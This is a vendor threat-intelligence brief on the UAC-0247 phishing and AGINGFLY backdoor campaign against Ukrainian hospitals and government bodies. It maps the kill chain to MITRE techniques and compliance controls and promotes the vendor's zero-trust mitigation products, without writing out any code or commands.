Executive Summary
Between March and April 2026, the Ukrainian Computer Emergency Response Team (CERT-UA) identified a surge in cyberattacks targeting healthcare institutions, emergency services, and local government bodies. The threat actor, designated as UAC-0247, employed phishing emails disguised as humanitarian aid offers to deliver malicious LNK files. These files exploited Windows utilities to execute remote code, leading to the deployment of multi-stage loaders and custom malware, notably the AGINGFLY backdoor. AGINGFLY facilitated persistent remote control, enabling attackers to steal credentials from Chromium-based browsers and WhatsApp, and to deploy additional tools like SILENTLOOP and RAVENSHELL for further exploitation. (bleepingcomputer.com)
This campaign underscores a concerning evolution in cyber threats, with attackers leveraging sophisticated social engineering tactics and dynamic malware to infiltrate critical infrastructure. The focus on healthcare and government sectors highlights the urgent need for enhanced cybersecurity measures to protect sensitive data and maintain operational integrity in essential services.
Why This Matters Now
The UAC-0247 campaign exemplifies the increasing sophistication of cyberattacks targeting critical infrastructure, particularly in sectors vital to public welfare. The use of advanced malware like AGINGFLY, which dynamically compiles command handlers at runtime, poses significant challenges to traditional detection methods. Organizations must prioritize the implementation of robust cybersecurity protocols, including employee training on phishing awareness, to mitigate the risks associated with such evolving threats.
Attack Path Analysis
The attack began with phishing emails disguised as humanitarian aid offers, leading victims to malicious websites that delivered LNK files. These files executed HTA scripts to download and run malware, including AGINGFLY, which established command and control channels. The malware facilitated credential theft from browsers and WhatsApp, enabling lateral movement within networks. Stolen data was exfiltrated to attacker-controlled servers, potentially leading to further exploitation or ransom demands.
Kill Chain Progression
Initial Compromise
Description
Attackers sent phishing emails posing as humanitarian aid offers, leading victims to malicious websites that delivered LNK files.
MITRE ATT&CK® Techniques
Spearphishing Attachment
Malicious File
Browser Information Discovery
Credentials from Web Browsers
Browser Session Hijacking
Web Protocols
Obfuscated Files or Information
PowerShell
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Malicious Software Prevention
Control ID: 6.4.3
NYDFS 23 NYCRR 500 – Training and Monitoring
Control ID: 500.14
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Identity and Access Management
Control ID: 3.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
HIPAA – Protection from Malicious Software
Control ID: 164.308(a)(5)(ii)(B)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Health Care / Life Sciences
Ukrainian clinics and emergency hospitals targeted by UAC-0247 infostealer malware campaign stealing sensitive browser and WhatsApp data, requiring enhanced egress security and encrypted traffic protection.
Government Administration
Government institutions directly targeted in data-theft campaign exploiting unencrypted traffic vulnerabilities, necessitating zero trust segmentation and multicloud visibility controls for threat detection.
Computer/Network Security
Security professionals must address lateral movement and command & control capabilities demonstrated in campaign, implementing threat detection systems and egress policy enforcement mechanisms.
Information Technology/IT
IT infrastructure requires immediate deployment of east-west traffic security and anomaly detection capabilities to prevent similar infostealer attacks targeting Chromium browsers and messaging applications.
Sources
- UAC-0247 Targets Ukrainian Clinics and Government in Data-Theft Malware Campaignhttps://thehackernews.com/2026/04/uac-0247-targets-ukrainian-clinics-and.htmlVerified
- New AgingFly malware used in attacks on Ukraine govt, hospitalshttps://www.bleepingcomputer.com/news/security/new-agingfly-malware-used-in-attacks-on-ukraine-govt-hospitals/Verified
- Ukraine Warns of Surge in Cyberattacks on Hospitals, Local Governments by UAC-0247 Hackershttps://thecyberexpress.com/cyberattacks-on-hospitals-by-uac-0247-hackers/Verified
- CERT-UA Impersonation Campaign Spread AGEWHEEZE Malware to 1 Million Emailshttps://thehackernews.com/2026/04/cert-ua-impersonation-campaign-spread.htmlVerified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Aviatrix Zero Trust CNSF is pertinent to this incident as it could likely limit the attacker's ability to move laterally and exfiltrate data by enforcing strict segmentation and controlled egress policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The CNSF may not directly prevent the initial phishing compromise but could limit the subsequent execution of malicious payloads within the cloud environment.
Control: Zero Trust Segmentation
Mitigation: Zero Trust Segmentation could likely limit the attacker's ability to escalate privileges by enforcing strict access controls between workloads.
Control: East-West Traffic Security
Mitigation: East-West Traffic Security could likely constrain the attacker's lateral movement by monitoring and controlling internal traffic flows.
Control: Multicloud Visibility & Control
Mitigation: Multicloud Visibility & Control could likely detect and limit unauthorized outbound communications to command and control servers.
Control: Egress Security & Policy Enforcement
Mitigation: Egress Security & Policy Enforcement could likely limit data exfiltration by controlling and monitoring outbound traffic.
While CNSF may not prevent the initial data exfiltration, its controls could likely limit the scope of data accessible to attackers, thereby reducing potential impact.
Impact at a Glance
Affected Business Functions
- Electronic Health Records (EHR)
- Patient Scheduling
- Billing Systems
- Emergency Response Coordination
Estimated downtime: 7 days
Estimated loss: $500,000
Patient medical records, including personally identifiable information (PII) and health histories.
Recommended Actions
Key Takeaways & Next Steps
- • Implement Zero Trust Segmentation to restrict lateral movement within the network.
- • Enforce Egress Security & Policy Enforcement to monitor and control outbound traffic, preventing unauthorized data exfiltration.
- • Deploy Threat Detection & Anomaly Response systems to identify and respond to malicious activities promptly.
- • Utilize Inline IPS (Suricata) to detect and prevent exploitation attempts and known malicious payloads.
- • Enhance Multicloud Visibility & Control to monitor and manage security across all cloud environments.
